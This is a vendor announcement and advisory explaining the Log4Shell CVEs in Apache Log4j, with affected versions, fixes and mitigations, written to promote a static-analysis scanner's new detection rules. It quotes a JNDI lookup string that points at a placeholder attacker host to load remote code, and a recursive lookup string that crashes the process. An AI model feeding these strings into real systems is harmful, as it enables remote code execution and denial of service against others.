DerScanner’s vulnerability database now includes Log4Shell zero-day threats
Author: Athena Dynamics & DerSecur
Copyright © 2021 All Rights Reserved
DerSecur has updated the vulnerability database of its DerScanner static analysis (SAST) tool: it now covers the recently disclosed zero-day vulnerabilities in the Apache Log4j library. Log4j is used by millions of enterprise applications and Java servers to log messages, including error messages. The vulnerabilities are collectively known as Log4Shell (also LogJam or LogJ) and are classified as Remote Code Execution (RCE) and Local Code Execution (LCE); a Denial of Service (DoS) vector was also identified.
Before the update, the DerScanner engine already flagged any untrusted data reaching a logging call as a “Log Forging” vulnerability. The analyzer has now been extended with additional rules that single out Log4Shell cases within the list of detected “Log Forging” findings.
“Companies around the world are widely using the vulnerable Apache Log4j library to develop Java products. Bearing in mind that exploiting the vulnerabilities is relatively easy, there are numerous vulnerable systems and a large number of attackers who don’t need expert technical skills to hack into these systems,” says Daniil Chernov, CTO of DerSecur. “To make a bad situation worse, many organizations do not have a process in place to monitor vulnerabilities, so despite the availability of security patches and recommendations to fix breaches, some organizations are still at risk. Our research lab monitors Log4Shell vulnerabilities, and the development team promptly adds them to the DerScanner vulnerability database.”
Rules have been added to the DerScanner analysis database to detect all vulnerabilities currently known in the Apache Log4j library:
CVE-2021-44228 (CVSS score: 10.0) — critical remote code execution vulnerability affecting Log4j versions 2.0-beta9 through 2.14.1. Fixed in 2.15.0, although that release turned out to be an incomplete fix (see CVE-2021-45046 below).
An attacker only needs to get a specially crafted string, a JNDI lookup of the form ${jndi:ldap://attacker-controlled-host/object}, into any field that a Java application logs through Log4j; an HTTP header or a form value is enough. When Log4j formats the log message it evaluates the lookup, connects to the attacker's server and loads the class it returns, so the vulnerable system downloads and runs attacker-supplied code. The attacker thereby gains control over the application or server and can develop the attack further from there.
The Apache Software Foundation released an emergency security update, version 2.15.0, but the fix was only partial: 2.15.0 left message lookups reachable under some non-default logging configurations, which still allowed intruders to attack a vulnerable system.
Version 2.15.0 addresses the vulnerability by disabling lookups in log messages (and with them JNDI lookups in messages) by default. In non-default configurations, for example a Pattern Layout that uses a Context Lookup such as $${ctx:loginId}, attacker-controlled input can still be evaluated as a JNDI lookup pattern, which can lead to denial of service and, in some environments, execution of arbitrary code. This scenario was assigned a separate identifier, CVE-2021-45046.
CVE-2021-44228 is exploitable when message lookups are enabled, that is, when the log4j2.formatMsgNoLookups property is false (its default in versions 2.10.0 through 2.14.1; the property does not exist before 2.10.0). In 2.15.0 the default behaviour changed so that message lookups are disabled, which is equivalent to that property being true; when updating to 2.15.0, do not set it back to false. Users who have not yet updated can reduce their exposure on 2.10.0 through 2.14.1 by setting the property to true (or the LOG4J_FORMAT_MSG_NO_LOOKUPS environment variable), but this mitigation was later shown to be incomplete (see CVE-2021-45046), so it is no substitute for upgrading.
CVE-2021-45046 (CVSS score: 9.0) — critical vulnerability that can be used for denial of service and, in some environments, remote code execution. It affects Log4j versions 2.0-beta9 through 2.15.0 (except 2.12.2, the fixed release for Java 7). Fixed in 2.16.0.
In Log4j 2.15.0 the CVE-2021-44228 issue remained exploitable under certain non-default configurations, because only one part of the message lookup functionality had been disabled. In 2.16.0, JNDI support is disabled by default and message lookup processing was removed entirely.
CVE-2021-45105 (CVSS score: 7.5) — denial-of-service vulnerability: specially crafted strings cause uncontrolled recursion during lookup evaluation, which ends in a StackOverflowError and a crashed process.
The vulnerability affects Log4j versions 2.0-beta9 through 2.16.0. These versions do not protect against uncontrolled recursion from self-referential lookups, so an attacker who controls a value that is substituted into a Pattern Layout context lookup (for example through the Thread Context Map) can supply a lookup that refers back to itself, such as ${${::-${::-$${::-j}}}}; evaluation recurses until the stack is exhausted and the process crashes. The fix was released in version 2.17.0 (for Java 8; the corresponding releases 2.12.3 and 2.3.1 cover the Java 7 and Java 6 branches).
CVE-2021-4104 (CVSS score: 8.1) — insecure deserialization in the JMSAppender of Log4j 1.2. It is exploitable only when an attacker can write to the Log4j configuration, or the configuration already references an attacker-controlled JNDI/LDAP endpoint, because JMSAppender then deserializes data obtained from that endpoint. Log4j 1.x is end-of-life and will not be fixed; migrating to Log4j 2 (version 2.17.0 at the time of writing) is required.